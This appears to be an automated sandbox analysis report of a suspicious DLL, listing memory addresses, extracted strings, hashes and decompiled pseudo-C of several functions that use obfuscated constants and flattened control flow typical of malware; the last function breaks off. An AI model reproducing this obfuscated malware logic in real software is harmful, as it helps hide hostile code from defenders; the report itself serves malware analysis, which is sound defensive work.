0x00000000
0x10005223
0x10005229
0x100052d1
0x10005300
0x10005305
0x10005307
0x1000530a
0x1000530d
0x10005313
0x00000000
0x10005313
0x1000522f
0x10005235
0x10005403
0x1000523b
0x10005241
0x00000000
0x10005247
0x10005247
0x1000524e
0x10005255
0x10005256
0x1000525d
0x10005264
0x1000526b
0x1000527d
0x10005291
0x100052a0
0x100052a7
0x100052ae
0x100052b7
0x100052be
0x100052c4
0x100052c7
0x00000000
0x100052c7
0x10005241
0x10005235
0x10005229
0x1000521d
0x10005211
0x1000540b
0x10005417
0x10005417
0x100053e2
0x100053e4
0x100053e4
0x100053e4
0x00000000

Strings

a-, xrefs: 10005029
!H, xrefs: 100051DA
Yj^", xrefs: 100050FB
I(, xrefs: 10004F64
^I, xrefs: 10004DAA
bp, xrefs: 10005000
s, xrefs: 10004E04
?N, xrefs: 10005060
iW, xrefs: 100050C4
k#, xrefs: 10004F22

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: s$!H$?N$I($Yj^"$^I$a-$bp$iW$k#
API String ID: 0-2383980949
Opcode ID: 10c59c9abcd6e5f21bfe388908324e8bd9e4e29f1ee9c9d610977a8d8493154a
Instruction ID: 1660d2de258cb4968f85a9aa25c18b5ff5517fef8f7d78cd36e1e29163a967c6
Opcode Fuzzy Hash: 10c59c9abcd6e5f21bfe388908324e8bd9e4e29f1ee9c9d610977a8d8493154a
Instruction Fuzzy Hash: 7DF11171508380DFE368CF25D589A5BBBE1FBC4758F108A2DF19A962A0C7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001D70B Relevance: 12.8, Strings: 10, Instructions: 258
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E1001D70B(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t250;
				intOrPtr _t253;
				intOrPtr* _t256;
				intOrPtr _t257;
				intOrPtr _t258;
				intOrPtr _t259;
				intOrPtr _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				void* _t272;
				void* _t301;
				intOrPtr* _t307;
				void* _t308;
				void* _t311;
				signed int* _t312;

				_t312 =  &_v96;
				_v16 = 0xfaeb;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x001f68fb;
				_v20 = 0x715d;
				_t311 = __edx;
				_t262 = __ecx;
				_t307 = 0;
				_t264 = 0x69;
				_v20 = _v20 / _t264;
				_v20 = _v20 ^ 0x00004d95;
				_t308 = 0x6d0b453;
				_v52 = 0xe4dc;
				_v52 = _v52 ^ 0xb66ed69d;
				_v52 = _v52 | 0x051c73ce;
				_v52 = _v52 ^ 0xb77e6da2;
				_v56 = 0xfea7;
				_v56 = _v56 | 0x2ac21b6d;
				_t265 = 0x28;
				_v56 = _v56 / _t265;
				_v56 = _v56 ^ 0x0111c769;
				_v40 = 0x7de3;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x00002cee;
				_v60 = 0x3598;
				_v60 = _v60 + 0xffff8bc6;
				_v60 = _v60 + 0xffffa8a6;
				_v60 = _v60 ^ 0xffff128a;
				_v48 = 0x4fef;
				_v48 = _v48 ^ 0xca9c5515;
				_v48 = _v48 + 0xb16f;
				_v48 = _v48 ^ 0xca9cd0c6;
				_v92 = 0xaa9;
				_t266 = 0x5f;
				_v92 = _v92 / _t266;
				_v92 = _v92 + 0xffff3c6a;
				_t267 = 0x59;
				_v92 = _v92 / _t267;
				_v92 = _v92 ^ 0x02e036a9;
				_v96 = 0x5de2;
				_v96 = _v96 + 0xffffe6a1;
				_v96 = _v96 << 0xa;
				_v96 = _v96 >> 6;
				_v96 = _v96 ^ 0x00042069;
				_v36 = 0x38d5;
				_v36 = _v36 >> 9;
				_v36 = _v36 ^ 0x00004e11;
				_v28 = 0x56eb;
				_v28 = _v28 | 0x64f5fc98;
				_v28 = _v28 ^ 0x64f5ec13;
				_v32 = 0x795a;
				_v32 = _v32 + 0x3d0e;
				_v32 = _v32 ^ 0x0000bf29;
				_v24 = 0xb411;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x000029d3;
				_v88 = 0x662b;
				_v88 = _v88 + 0xffff211d;
				_v88 = _v88 >> 0xa;
				_v88 = _v88 + 0xa5d0;
				_v88 = _v88 ^ 0x0040a179;
				_v76 = 0x93a7;
				_v76 = _v76 | 0xd5df8e88;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0xa2f79e4d;
				_v76 = _v76 ^ 0xafaa69d8;
				_v44 = 0x9179;
				_v44 = _v44 | 0xc93173a7;
				_v44 = _v44 + 0xffff069d;
				_v44 = _v44 ^ 0xc930e98d;
				_v80 = 0xde50;
				_v80 = _v80 << 1;
				_v80 = _v80 ^ 0x604d01d6;
				_v80 = _v80 | 0x2ae37b3d;
				_v80 = _v80 ^ 0x6aefa4f8;
				_v84 = 0xd578;
				_v84 = _v84 << 0xe;
				_t268 = 0x68;
				_v84 = _v84 / _t268;
				_v84 = _v84 >> 0xb;
				_v84 = _v84 ^ 0x0000750e;
				_v64 = 0x2e2a;
				_v64 = _v64 << 3;
				_t269 = 0x30;
				_v64 = _v64 / _t269;
				_v64 = _v64 + 0xffff5448;
				_v64 = _v64 ^ 0xffff6494;
				_v68 = 0x2d37;
				_t270 = 0xc;
				_v68 = _v68 / _t270;
				_v68 = _v68 >> 0x10;
				_t271 = 0x67;
				_v68 = _v68 / _t271;
				_v68 = _v68 ^ 0x00004502;
				_v12 = 0x26d1;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x026d46c6;
				_v72 = 0x25a0;
				_v72 = _v72 * 0x64;
				_v72 = _v72 << 0xf;
				_v72 = _v72 | 0x287c3bd2;
				_v72 = _v72 ^ 0x797c3acd;
				_v4 = 0x7952;
				_v4 = _v4 * 0x12;
				_v4 = _v4 ^ 0x0008812f;
				_v8 = 0x95b5;
				_v8 = _v8 + 0xffff9cc1;
				_v8 = _v8 ^ 0x000073a2;
				while(1) {
					L1:
					_t250 = 0x6ec61ec;
					while(1) {
						L2:
						_t272 = 0x5c1247c;
						do {
							L3:
							while(_t308 != 0x28e0d0b) {
								if(_t308 == 0x57801b6) {
									return E1000DE81(_v4, _t307, _v8);
								}
								if(_t308 == _t272) {
									 *((intOrPtr*)(_t307 + 0x44)) = _t262;
									_t253 =  *0x10021084;
									 *_t307 = _t253;
									 *0x10021084 = _t307;
									return _t253;
								}
								if(_t308 == 0x6d0b453) {
									_push(_t272);
									_t301 = 0x50;
									_t256 = E100054FB(_t301);
									_t307 = _t256;
									__eflags = _t307;
									if(__eflags == 0) {
										return _t256;
									}
									_t308 = 0x22b948bf;
									while(1) {
										L1:
										_t250 = 0x6ec61ec;
										L2:
										_t272 = 0x5c1247c;
										goto L3;
									}
								}
								if(_t308 == _t250) {
									_push(E1001C192);
									_push(_v84);
									_push(_t272);
									_push(_v80);
									_push(_v44);
									_t257 = E1000903E(_t307, _v76);
									_t312 = _t312 - 0xc + 0x20;
									 *((intOrPtr*)(_t307 + 0x28)) = _t257;
									__eflags = _t257;
									_t272 = 0x5c1247c;
									_t250 = 0x6ec61ec;
									_t308 =  !=  ? 0x5c1247c : 0x28e0d0b;
									continue;
								}
								if(_t308 == 0x206c9a2f) {
									_t258 = E10003B5C( *((intOrPtr*)(_t307 + 8)), _v24, _v88);
									_t312 =  &(_t312[1]);
									 *((intOrPtr*)(_t307 + 0x18)) = _t258;
									__eflags = _t258;
									_t250 = 0x6ec61ec;
									_t308 =  !=  ? 0x6ec61ec : 0x28e0d0b;
									goto L2;
								}
								_t321 = _t308 - 0x22b948bf;
								if(_t308 != 0x22b948bf) {
									goto L18;
								}
								_push(_t272);
								_t259 = E10005B7D(_v52, _t311, _t321, _v56, _v40, _v60);
								_t312 =  &(_t312[4]);
								 *((intOrPtr*)(_t307 + 8)) = _t259;
								if(_t259 == 0) {
									_t308 = 0x57801b6;
								} else {
									E10005696(_v48,  *((intOrPtr*)(_t307 + 8)), _v92, _v96,  *((intOrPtr*)(_t307 + 8)), _v36);
									_push(_v32);
									E10011A48( *((intOrPtr*)(_t307 + 8)));
									_t312 =  &(_t312[5]);
									_t308 = 0x206c9a2f;
								}
								goto L1;
							}
							E1001A8BF(_v64, _v68, _v12, _v72,  *((intOrPtr*)(_t307 + 8)));
							_t312 =  &(_t312[3]);
							_t308 = 0x57801b6;
							_t250 = 0x6ec61ec;
							_t272 = 0x5c1247c;
							L18:
							__eflags = _t308 - 0x6c42194;
						} while (__eflags != 0);
						return _t250;
					}
				}
			}

0x1001d70b
0x1001d70e
0x1001d716
0x1001d71b
0x1001d723
0x1001d733
0x1001d735
0x1001d73b
0x1001d73d
0x1001d742
0x1001d748
0x1001d750
0x1001d755
0x1001d75d
0x1001d765
0x1001d76d
0x1001d775
0x1001d77d
0x1001d789
0x1001d78e
0x1001d794
0x1001d79c
0x1001d7a4
0x1001d7a9
0x1001d7b1
0x1001d7b9
0x1001d7c1
0x1001d7c9
0x1001d7d1
0x1001d7d9
0x1001d7e1
0x1001d7e9
0x1001d7f1
0x1001d7fd
0x1001d802
0x1001d808
0x1001d814
0x1001d817
0x1001d81b
0x1001d823
0x1001d82b
0x1001d833
0x1001d838
0x1001d83d
0x1001d845
0x1001d84d
0x1001d852
0x1001d85a
0x1001d862
0x1001d86a
0x1001d872
0x1001d87a
0x1001d882
0x1001d88a
0x1001d892
0x1001d897
0x1001d89f
0x1001d8a7
0x1001d8af
0x1001d8b4
0x1001d8bc
0x1001d8c4
0x1001d8cc
0x1001d8d6
0x1001d8db
0x1001d8e3
0x1001d8eb
0x1001d8f3
0x1001d8fb
0x1001d903
0x1001d90b
0x1001d913
0x1001d917
0x1001d91f
0x1001d927
0x1001d92f
0x1001d937
0x1001d942
0x1001d947
0x1001d94d
0x1001d952
0x1001d95a
0x1001d962
0x1001d96b
0x1001d970
0x1001d976
0x1001d97e
0x1001d986
0x1001d992
0x1001d997
0x1001d99d
0x1001d9a6
0x1001d9a9
0x1001d9ad
0x1001d9b5
0x1001d9bd
0x1001d9c2
0x1001d9ca
0x1001d9d7
0x1001d9db
0x1001d9e0
0x1001d9e8
0x1001d9f0
0x1001d9fd
0x1001da01
0x1001da09
0x1001da11
0x1001da19
0x1001da21
0x1001da21
0x1001da21
0x1001da26
0x1001da26
0x1001da26
0x1001da2b
0x00000000
0x1001da2b
0x1001da3d
0x00000000
0x1001dbbb
0x1001da45
0x1001db9a
0x1001db9d
0x1001dba2
0x1001dba4
0x00000000
0x1001dba4
0x1001da51
0x1001db48
0x1001db4b
0x1001db4c
0x1001db51
0x1001db54
0x1001db56
0x1001dbc3
0x1001dbc3
0x1001db58
0x1001da21
0x1001da21
0x1001da21
0x1001da26
0x1001da26
0x00000000
0x1001da26
0x1001da21
0x1001da59
0x1001db01
0x1001db09
0x1001db0d
0x1001db0e
0x1001db14
0x1001db1c
0x1001db21
0x1001db24
0x1001db27
0x1001db2e
0x1001db33
0x1001db38
0x00000000
0x1001db38
0x1001da65
0x1001dae2
0x1001dae7
0x1001daea
0x1001daed
0x1001daf4
0x1001daf9
0x00000000
0x1001daf9
0x1001da67
0x1001da6d
0x00000000
0x00000000
0x1001da73
0x1001da86
0x1001da8b
0x1001da8e
0x1001da93
0x1001dacd
0x1001da95
0x1001daab
0x1001dab0
0x1001dabb
0x1001dac0
0x1001dac3
0x1001dac3
0x00000000
0x1001da93
0x1001db75
0x1001db7a
0x1001db7d
0x1001db82
0x1001db87
0x1001db8c
0x1001db8c
0x1001db8c
0x00000000
0x1001da2b
0x1001da26

Strings

={*, xrefs: 1001D91F
Zy, xrefs: 1001D872
7-, xrefs: 1001D986
O, xrefs: 1001D7D1
V, xrefs: 1001D85A
*., xrefs: 1001D95A
+f, xrefs: 1001D89F
Ry, xrefs: 1001D9F0
], xrefs: 1001D823
,, xrefs: 1001D7A9

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: *.$+f$7-$={*$Ry$Zy$,$O$V$]
API String ID: 0-2837054829
Opcode ID: 2ed46f64f244493fecafb7046f423cfd3950949ac396ee6e8883002bcc409040
Instruction ID: 91d439098d35f7a0188f63cc51a04f27616fc22e159e1bc48c0c6b971e9b6e1e
Opcode Fuzzy Hash: 2ed46f64f244493fecafb7046f423cfd3950949ac396ee6e8883002bcc409040
Instruction Fuzzy Hash: F3C164719083409FD358DF21C88A40BBBF1FBD5354F108A2EF59A9A2A0D3B6D959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10003B74 Relevance: 12.7, Strings: 10, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10003B74() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t230;
				intOrPtr* _t236;
				signed int _t239;
				intOrPtr* _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				void* _t247;
				void* _t273;
				signed int* _t277;

				_t277 =  &_v104;
				_v8 = 0x3773eb;
				_v4 = 0;
				_v32 = 0xef71;
				_v32 = _v32 | 0x54f813f9;
				_v32 = _v32 ^ 0xd4f8fff8;
				_v24 = 0x7557;
				_v24 = _v24 << 0xf;
				_v24 = _v24 ^ 0x3aab8002;
				_v40 = 0xe4a5;
				_v40 = _v40 + 0xc2ea;
				_v40 = _v40 ^ 0x0001a89f;
				_v92 = 0x30e1;
				_v92 = _v92 << 5;
				_v92 = _v92 << 5;
				_v92 = _v92 | 0xbe715f5e;
				_v92 = _v92 ^ 0xbef39162;
				_v96 = 0x800f;
				_v96 = _v96 >> 0xc;
				_v96 = _v96 ^ 0x80e6ae84;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0x00021582;
				_v44 = 0x11be;
				_v12 = 0;
				_t273 = 0x2fb03e9c;
				_t242 = 0x1d;
				_v44 = _v44 / _t242;
				_v44 = _v44 ^ 0x000025b0;
				_v52 = 0xe658;
				_v52 = _v52 >> 5;
				_v52 = _v52 << 0xc;
				_v52 = _v52 ^ 0x007363dc;
				_v76 = 0x5b3a;
				_t243 = 0x5d;
				_v76 = _v76 * 0x4c;
				_v76 = _v76 ^ 0x14ef7786;
				_v76 = _v76 ^ 0x3048edb2;
				_v76 = _v76 ^ 0x24bca182;
				_v80 = 0xa333;
				_v80 = _v80 / _t243;
				_v80 = _v80 >> 0xd;
				_v80 = _v80 | 0x62916cec;
				_v80 = _v80 ^ 0x629113ba;
				_v28 = 0x738c;
				_v28 = _v28 + 0xfffff99e;
				_v28 = _v28 ^ 0x00000a6b;
				_v56 = 0x3e6f;
				_t244 = 0xc;
				_v56 = _v56 / _t244;
				_v56 = _v56 | 0xe9662750;
				_v56 = _v56 ^ 0xe9666ada;
				_v36 = 0x6860;
				_t245 = 0x2d;
				_v36 = _v36 / _t245;
				_v36 = _v36 ^ 0x00001ef2;
				_v84 = 0x885e;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 << 6;
				_v84 = _v84 + 0xffffce7b;
				_v84 = _v84 ^ 0xffffd5d3;
				_v88 = 0xb8f7;
				_v88 = _v88 ^ 0xd543d054;
				_v88 = _v88 >> 0xb;
				_v88 = _v88 + 0xffffaf1d;
				_v88 = _v88 ^ 0x001a1dea;
				_v60 = 0x284b;
				_v60 = _v60 << 0xc;
				_v60 = _v60 >> 4;
				_v60 = _v60 ^ 0x00281b1d;
				_v72 = 0x3dfc;
				_t246 = 0x58;
				_t239 = _v12;
				_v72 = _v72 / _t246;
				_v72 = _v72 + 0x95dc;
				_v72 = _v72 ^ 0xd14426bc;
				_v72 = _v72 ^ 0xd1448cb1;
				_v48 = 0xe934;
				_v48 = _v48 | 0xd53a3366;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x03548d4a;
				_v20 = 0x964c;
				_v20 = _v20 * 0x17;
				_v20 = _v20 ^ 0x000de1e5;
				_v100 = 0x9e1;
				_v100 = _v100 ^ 0xf4897f8a;
				_v100 = _v100 ^ 0x36e5ee60;
				_v100 = _v100 | 0xb880b9d7;
				_v100 = _v100 ^ 0xfaecd773;
				_v104 = 0xd03a;
				_v104 = _v104 ^ 0x48aea30f;
				_v104 = _v104 + 0x939c;
				_v104 = _v104 >> 2;
				_v104 = _v104 ^ 0x122bf007;
				_v64 = 0xf900;
				_v64 = _v64 | 0x2edbad32;
				_v64 = _v64 << 0xf;
				_v64 = _v64 | 0x270e07c3;
				_v64 = _v64 ^ 0xff9f7a70;
				_v68 = 0xa250;
				_v68 = _v68 << 0xc;
				_v68 = _v68 + 0x89c3;
				_v68 = _v68 * 0x55;
				_v68 = _v68 ^ 0x5e76c64d;
				while(1) {
					L1:
					_t247 = 0x5c;
					while(1) {
						_t230 = 0x2118c244;
						do {
							L3:
							while(_t273 != 0x1831a392) {
								if(_t273 == _t230) {
									_t236 = E10011EDA(_v100, _t239, _v16, _v104);
									_t273 = 0x371ab96e;
									__eflags = _t236;
									_v12 = 0 | __eflags == 0x00000000;
									goto L1;
								} else {
									if(_t273 == 0x25797f14) {
										_t241 =  *0x10021088 + 0x38;
										while(1) {
											__eflags =  *_t241 - _t247;
											if(__eflags == 0) {
												break;
											}
											_t241 = _t241 + 2;
											__eflags = _t241;
										}
										_t239 = _t241 + 2;
										_t273 = 0x1831a392;
										_t230 = 0x2118c244;
										continue;
									} else {
										if(_t273 == 0x2fb03e9c) {
											_t273 = 0x25797f14;
											continue;
										} else {
											if(_t273 != 0x371ab96e) {
												goto L17;
											} else {
												E100170CF(_v64, _v68, _v16);
											}
										}
									}
								}
								L9:
								return _v12;
							}
							_push(0x10001368);
							_push(_v44);
							_push(_v96);
							_t248 = _v40;
							__eflags = E10010A84(E10005DFC(_v40, _v92, __eflags), _v52, _v24, _v76, _v80, _v40, _v28, _v40,  &_v16, _v32, _t248, _t248, _v56, _v36, _v84, _v88, _t248, _v60);
							_t273 =  ==  ? 0x2118c244 : 0x27c3a10;
							E10010D6D(_v72, _v48, _v20, _t231);
							_t277 =  &(_t277[0x15]);
							_t230 = 0x2118c244;
							_t247 = 0x5c;
							L17:
							__eflags = _t273 - 0x27c3a10;
						} while (__eflags != 0);
						goto L9;
					}
				}
			}

0x10003b74
0x10003b7b
0x10003b85
0x10003b8b
0x10003b93
0x10003b9b
0x10003ba3
0x10003bab
0x10003bb0
0x10003bb8
0x10003bc0
0x10003bc8
0x10003bd0
0x10003bd8
0x10003bdd
0x10003be2
0x10003bea
0x10003bf2
0x10003bfa
0x10003bff
0x10003c07
0x10003c0c
0x10003c14
0x10003c1c
0x10003c20
0x10003c2b
0x10003c30
0x10003c36
0x10003c3e
0x10003c46
0x10003c4b
0x10003c50
0x10003c58
0x10003c65
0x10003c68
0x10003c6c
0x10003c74
0x10003c7c
0x10003c84
0x10003c94
0x10003c98
0x10003c9d
0x10003ca5
0x10003cad
0x10003cb5
0x10003cbd
0x10003cc5
0x10003cd1
0x10003cd6
0x10003cdc
0x10003ce4
0x10003cec
0x10003cf8
0x10003cfb
0x10003cff
0x10003d07
0x10003d0f
0x10003d14
0x10003d19
0x10003d21
0x10003d29
0x10003d33
0x10003d40
0x10003d45
0x10003d4d
0x10003d55
0x10003d5d
0x10003d62
0x10003d67
0x10003d6f
0x10003d7d
0x10003d80
0x10003d84
0x10003d88
0x10003d90
0x10003d98
0x10003da0
0x10003da8
0x10003db0
0x10003db5
0x10003dbd
0x10003dca
0x10003dce
0x10003dd6
0x10003dde
0x10003de6
0x10003dee
0x10003df6
0x10003dfe
0x10003e06
0x10003e0e
0x10003e16
0x10003e1b
0x10003e23
0x10003e2b
0x10003e33
0x10003e38
0x10003e40
0x10003e48
0x10003e50
0x10003e55
0x10003e62
0x10003e66
0x10003e6e
0x10003e6e
0x10003e70
0x10003e71
0x10003e71
0x10003e76
0x00000000
0x10003e76
0x10003e80
0x10003eeb
0x10003ef4
0x10003ef9
0x10003efe
0x00000000
0x10003e82
0x10003e88
0x10003ec9
0x10003ed1
0x10003ed1
0x10003ed4
0x00000000
0x00000000
0x10003ece
0x10003ece
0x10003ece
0x10003ed6
0x10003ed9
0x10003e71
0x00000000
0x10003e8a
0x10003e90
0x10003ebc
0x00000000
0x10003e92
0x10003e98
0x00000000
0x10003e9e
0x10003eaa
0x10003eaf
0x10003e98
0x10003e90
0x10003e88
0x10003eb0
0x10003ebb
0x10003ebb
0x10003f07
0x10003f0c
0x10003f10
0x10003f18
0x10003f6c
0x10003f8b
0x10003f8e
0x10003f93
0x10003f96
0x10003f9d
0x10003f9e
0x10003f9e
0x10003f9e
0x00000000
0x10003faa
0x10003e71

Strings

s7, xrefs: 10003B7B
4, xrefs: 10003DA0
k, xrefs: 10003CBD
P'f, xrefs: 10003CDC
K(, xrefs: 10003D55
`6, xrefs: 10003DE6
k, xrefs: 10003DC5
`h, xrefs: 10003CEC
:[, xrefs: 10003C58
0, xrefs: 10003BD0

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4$:[$K($P'f$`h$`6$k$0$s7$k
API String ID: 0-1983453149
Opcode ID: 223bf9661f89593d1d3493f7a4a61710e6f16cfef84f431d060270429275618a
Instruction ID: 81be858e1a0ad7becfbb86db6d7737785c0be4d21ca8464575a9a58e88ab0c9a
Opcode Fuzzy Hash: 223bf9661f89593d1d3493f7a4a61710e6f16cfef84f431d060270429275618a
Instruction Fuzzy Hash: 31B113725093809FE359CF25D88A90FBBE1FBC4788F108A1DF595862A0D7B5C949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10007731 Relevance: 12.7, Strings: 10, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10007731(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t170;
				intOrPtr* _t191;
				void* _t193;
				intOrPtr _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				void* _t215;
				signed int* _t217;

				_push(_a20);
				_t191 = __edx;
				_t215 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t170);
				_v12 = 0x49dec4;
				_t209 = 0;
				_v8 = 0x408154;
				_t217 =  &(( &_v84)[7]);
				_v4 = 0;
				_v52 = 0x694b;
				_t193 = 0x182a63aa;
				_v52 = _v52 + 0xffff5e5b;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0fff8bf7;
				_v56 = 0x41f7;
				_v56 = _v56 + 0x4138;
				_t210 = 0x11;
				_v56 = _v56 * 0x3c;
				_v56 = _v56 ^ 0x001ebd7f;
				_v24 = 0x2024;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x000030b8;
				_v28 = 0xded3;
				_v28 = _v28 / _t210;
				_v28 = _v28 ^ 0x00001e19;
				_v32 = 0xc31c;
				_t211 = 9;
				_v32 = _v32 * 0x46;
				_v32 = _v32 ^ 0x00354647;
				_v60 = 0x23e0;
				_v60 = _v60 << 0xa;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x047c537c;
				_v64 = 0xeb08;
				_v64 = _v64 / _t211;
				_v64 = _v64 << 0x10;
				_v64 = _v64 ^ 0x1a1d4286;
				_v68 = 0x30b7;
				_v68 = _v68 | 0x586a18cc;
				_v68 = _v68 ^ 0x9b6ff92b;
				_v68 = _v68 ^ 0xc305ffb2;
				_v84 = 0x4a65;
				_t212 = 0x11;
				_v84 = _v84 * 0x7e;
				_v84 = _v84 + 0x6e5;
				_v84 = _v84 ^ 0x53a45cff;
				_v84 = _v84 ^ 0x5380fb2a;
				_v48 = 0xcc07;
				_v48 = _v48 + 0x32ac;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0007ae20;
				_v72 = 0xea77;
				_v72 = _v72 * 0x14;
				_v72 = _v72 + 0x41ea;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00013230;
				_v16 = 0x78a9;
				_v16 = _v16 + 0xaadf;
				_v16 = _v16 ^ 0x000171b6;
				_v36 = 0x9bd0;
				_v36 = _v36 ^ 0xa8005f8b;
				_v36 = _v36 | 0xb140c83a;
				_v36 = _v36 ^ 0xb940c62b;
				_v76 = 0x6529;
				_v76 = _v76 + 0x50c8;
				_v76 = _v76 | 0xe567bb7e;
				_v76 = _v76 ^ 0xe5678af7;
				_v20 = 0x8b43;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x8b433351;
				_v40 = 0x866a;
				_t213 = 0x19;
				_t214 = _v16;
				_v40 = _v40 / _t213;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x00003fe9;
				_v44 = 0xef9a;
				_v44 = _v44 * 0x21;
				_v44 = _v44 << 0xe;
				_v44 = _v44 ^ 0xb8b6d4b8;
				_v80 = 0x5ae9;
				_v80 = _v80 + 0xb2b1;
				_v80 = _v80 | 0x3da6d513;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x003dfd01;
				while(_t193 != 0x182a63aa) {
					if(_t193 == 0x251a2d5f) {
						_t163 =  &_v40; // 0x354647
						E1001B94A(_t209, _t214, _t215, _t193, _t193, _a4, _v72, _v16, _v36, _t193, _v76, _v20,  *_t163, _a20, _v44, _v80);
						if(_t191 != 0) {
							 *_t191 = _t214;
						}
						L14:
						return _t209;
					}
					if(_t193 == 0x2efe34a0) {
						_push(_t193);
						_t209 = E100054FB(_t214);
						if(_t209 == 0) {
							goto L14;
						}
						_t193 = 0x251a2d5f;
						continue;
					}
					if(_t193 != 0x34522f7d) {
						L10:
						if(_t193 != 0x226dac5d) {
							continue;
						}
						goto L14;
					}
					_t214 = E1001B94A(0, 0, _t215, _t193, _t193, _a4, _v52, _v56, _v24, _t193, _v28, _v32, _v60, _a20, _v64, _v68);
					_t217 =  &(_t217[0xe]);
					if(_t214 == 0) {
						goto L14;
					}
					_t193 = 0x2efe34a0;
				}
				_t193 = 0x34522f7d;
				goto L10;
			}

0x10007738
0x1000773c
0x1000773e
0x10007740
0x10007744
0x10007748
0x1000774c
0x10007750
0x10007751
0x10007752
0x10007757
0x1000775f
0x10007761
0x10007769
0x1000776c
0x10007772
0x1000777a
0x1000777f
0x10007787
0x1000778c
0x10007794
0x1000779c
0x100077ab
0x100077ae
0x100077b2
0x100077ba
0x100077c2
0x100077c7
0x100077cf
0x100077df
0x100077e3
0x100077eb
0x100077f8
0x100077fb
0x100077ff
0x10007807
0x1000780f
0x10007814
0x10007819
0x10007821
0x10007831
0x10007835
0x1000783a
0x10007842
0x1000784a
0x10007852
0x1000785a
0x10007862
0x1000786f
0x10007870
0x10007874
0x1000787c
0x10007884
0x1000788c
0x10007894
0x1000789c
0x100078a1
0x100078a9
0x100078b6
0x100078ba
0x100078c8
0x100078cc
0x100078d6
0x100078de
0x100078e6
0x100078ee
0x100078f6
0x100078fe
0x10007906
0x1000790e
0x10007916
0x1000791e
0x10007926
0x1000792e
0x10007936
0x1000793b
0x10007943
0x10007951
0x10007954
0x10007958
0x1000795c
0x10007961
0x10007969
0x10007976
0x1000797a
0x1000797f
0x10007987
0x1000798f
0x10007997
0x1000799f
0x100079a4
0x100079ac
0x100079be
0x10007a64
0x10007a89
0x10007a93
0x10007a95
0x10007a95
0x10007a97
0x10007aa0
0x10007aa0
0x100079ca
0x10007a29
0x10007a2f
0x10007a34
